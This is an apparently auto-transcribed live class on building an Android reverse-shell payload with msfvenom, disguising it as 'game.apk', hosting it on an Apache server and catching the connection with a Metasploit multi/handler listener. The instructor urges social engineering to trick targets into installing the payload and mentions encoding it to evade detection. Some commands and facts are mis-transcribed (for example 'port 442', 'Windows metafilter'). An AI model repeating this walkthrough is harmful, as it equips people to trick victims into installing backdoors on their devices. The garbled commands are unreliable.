P now, you can see it here, right? It stands for what? Payload. They are trying to choose a payload. It says payload to use. Okay, you can use hyphen list payload to list the payload, hyphen list options to list arguments and all that. But we are not going into that tonight. All right, we'll just those checks. Then Windows metafilter reverse underscore TCP. So that's the payload we selected after indicating that I want to select a payload, which is hyphen P. So this reverse TCP means I want to create a connection. Our target machine to connect back to our attacker machine, which is Linux, and it will be able to do that using this the IP that we're going to provide there, which is the localhost IP, which is your Kali IP. Okay, your attacker machine IP or your attack machine IP. Then hyphen F is file, more like a format, output format for the file. So we use the command. So in this case, they are, like I told you, they are creating a Windows file, and Windows extension is .exe, while Android is .apk. So that's why exe was used there. Then hyphen O means to write out. Okay, to write out or save the payload to a file. Now this is a payload name, then .exe again. So let's go ahead and create that payload one more time. So MSF Venom -P. Okay. Android /the okay underscore TCP. Now, like I told you, host is equal to our IP address, then port is equal to, we can use 5555, we can use 8080. Okay, then I'll just use hyphen O to write out, then I would name it, let's say, game.apk. Right? So once I hit enter, it's going to take a while, and then it's going to generate the payload. All right, so our payload is done generating. So mind you, before you do anything, you need to navigate to a directory that you want to, create a payload. Although it's not like you're still going to move it into your what's it called? You're still going to move it into what's this thing called again? Into your server, that's your Linux server, okay? But you just need to have that at the back of your mind. Sorry, hand is raised here. I have a question.
I have a question.
Yeah, good evening.
Can you hear me, sir?
Yes, I can hear you now. I can hear you.
Okay. So my question is, why is our hello port 5555?
Okay, why is 55?
Yes.
Okay, it's a port that I selected. Okay. You see, I always encourage that people understand, the fundamentals of computer before they even begin to hack. Now, in computer, you need to one thing you need to know is that every device has 65,000 plus ports. Every device. Okay, my computer has 65,000 plus ports. I think 65,500 or so. And this port now is one of the free ports. It's free actually. There's no service that's running on it at the moment, and it's also available to help me create a shellback. That is why I use the 5555. I can use 8080 also. So I hope that answers the question.
Yes, sir. So, sir, how do you know if the port is free or not?
Okay, it's very basic. You can look it up. Well, let's say for instance now you have a port HTTP that's running on port 80, right? HTTPS that's running on port 442. Okay, you have SMTP, you have um, FTP that's running on 21. Okay, so you can
Yeah.
just look it up. You can just look it up online. You don't need to have it offline. Okay, you can just look it up
Okay.
online and you know choose the one you wish to use.
All right, sir. Thank you.
Yeah. All right. Welcome. So oh boy, we have just 20 minutes left. So the next thing we are going to do now is to start our Apache server. So like I said, we are going to host this payload on our local kind of web server so that our targets can visit the web server and download it directly from there into their device. Okay. So during the delivery part, you have to include or in would I say employ very quality social engineering into your process that can make your target click on your link, download your payload and run it as well. So if I run ls, okay, this is a payload that I just created, game.apk. Can you see that here? So if I go to this guy here, let's go to I'm in downloads, right? Open downloads. Here is it. I think enhanced this. Yeah, go on and ask the question. Go on and ask the
I
question.
wanted to just say I wanted to just say that your screen was not showing in my phone. That's what I wanted to just say. You just line take him off.
Okay, but can you see it now?
Yes.
All right, all right. So here is the payload that I've just created. Let me run ls again. Okay, here it is, the payload that I just created, and you can find it in my downloads directory. Okay, because I'm in my downloads from my prompt, so you can see them in my downloads. All right, now let's go ahead and start our Apache server, then move our payload to our Linux server here, our local server. So to start the Apache server, just sudo service Apache 2 start. So it's going to prompt you to enter a password. So you can check that if it has actually started with this command sudo service Apache 2 status. All right, so what's our status showing here? What's it showing there? What's our status showing? Please mute yourself everywhere. Drop it in the comment section if you are seeing what our status is showing. You can see what our status is showing. Drop it in the comment section if you can see what our status is showing. No one is seeing it. Are we following? I just highlighted it though in case you are looking for it. So what's our status showing? All right, very good. You can see it. Active running. Very good. So Go ahead, press Ctrl C, and now let's go ahead and move this our payload to our web server directory. Okay, and the command is simple. Let's this is what we are moving here. The payload we just created. Sudo nv in .apk. So we are going to bar slash www slash html. All right. So notice if I list the content of this directory, I can't find it here anymore. Right. So let me move navigate to my web server directory again. So you are seeing it here, right? Okay, let's go back to download. Okay, so since we've done this, I'll now go ahead and start the listener. Let me just open a new. Well, notice something. When I showed you that payload, it wasn't looking like it was looking like a funny file. Oh, I should have made a copy of that too. Might just have to copy it. Let me go back to that. Um, mm, okay, sorry in case if you are a bit confused. What I did was that I went back to this my Apache server directory, which is var.www/html. Sorry, it's not dot. And I copied the payload I created to my desktop environment so I can see it here. I seen the payload I just created. Copy it to my desktop environment so I can see it. All right. Let's proceed. Now, what I want to do is to open my party listener. Okay, it's MSF console. So let's give it a minute to set up. Okay, we have just 10 minutes. Let's see if we can finish this session in 10 minutes. Then next week we'll continue. I don't want to pause for so long, but I told you this program is going to run throughout the year. So just take it little by little. We have a lot of tricks, like a lot. Okay, so from what you can see here, this is your Metasploit environment that I spoke about earlier. So from here, you can see that we have 2,519 exploits in this Metasploit framework. We have 1,296 auxiliary. So in auxiliary, you can find things like scanners that can help you scan devices, networks, or not devices, actually networks and software as well. We have 431 post exploitation models. We have 1,610 payloads. Okay. So they keep adding this as more vulnerabilities come in, are found by security researchers. They keep adding it up here. We have 49 encoders, so and 13 nodes. This one helps you like uh encode your payload. Sorry about that. But so that it can be kind of FUD, fully undetectable. Then we have 13 nodes. So this option is like is a command or you give to your processor to do nothing. Okay, that's what no it. Then we have 9 evasion, right? So my prompt is out. I was waiting for this guy to come up. Now I'll go ahead and use the same exploits I used earlier. Firstly, I'll run use exploits. Okay, multi-handler. Then I'm going to set my payload to the same this option I use here. I'm going to set it to this. Just copy that quick. I'll do set payload. Okay. Then I'll paste it. So I want to use this is the payload. That's the option I want to select. So once I set the payload, the next thing I need to do is just to modify the options and we are good to go. So once I run the 2 options, so these are the things that we need to modify here. We need to impute, modify this L host and L port. I see in the L port here, default L port here is 4444, but we used 5555. So I'm going to change this to 5555, and then this L host section is empty, and I'll impute my L host address here, and that's all. We are good to go. Okay, that's not really all actually, but I mean for setting up and selecting a payload, that's all. All right. So to do that, it's quite basic as well. Just uh, let's start with the L host. Set L host. What's that my IP again? Sorry, I did it. Now set L ports to 1, 2, 3, 4, 5, 5, 5, 5. Okay. I'll show options again, and as you can see, this and this has been set. Okay. So and if you to also know the things I need to set, you look at this require section. Required is telling me that yes, this option must be set, and yes, this option must be set. So okay, I will leave other options for advanced section. Now I'll just go ahead and run this. Okay, but before I click on run, I would want to download this payload to my target device. Now, what I should have done, or what I should do, is to visit to for to visit this IP address. Okay, I should to show you guys what I'm doing. I should use a VM. Okay, but I don't have. I used to have Android ADB. Sorry, not Android ADB. What's it called again? This Android Studio, yeah. Okay, and there's this Android VM that we do use back in the days. I mean, 5, 6 years ago, that we do use. Or not? Yeah, but it's no longer very much active. But Android Studio would have been a better option, but I don't have it now. But I'm going to connect. I'm still going to. use my phone that's here and download this payload into my device, and then it's going to run. All right. And once I do that, you will see me gain a shell on this. So first things first, just give me minutes while I download the payload from my device. So you can ask your questions if you have any questions. So while I download the payload to my Android device. So if you have a question, ask questions now so that we can achieve two things at once. All right.
So my question is, the exploit target. I'm seeing white card, white card target. What is white card target?
And please, our director is having network issues, but he'll soon be back. Let's just hold on a little bit.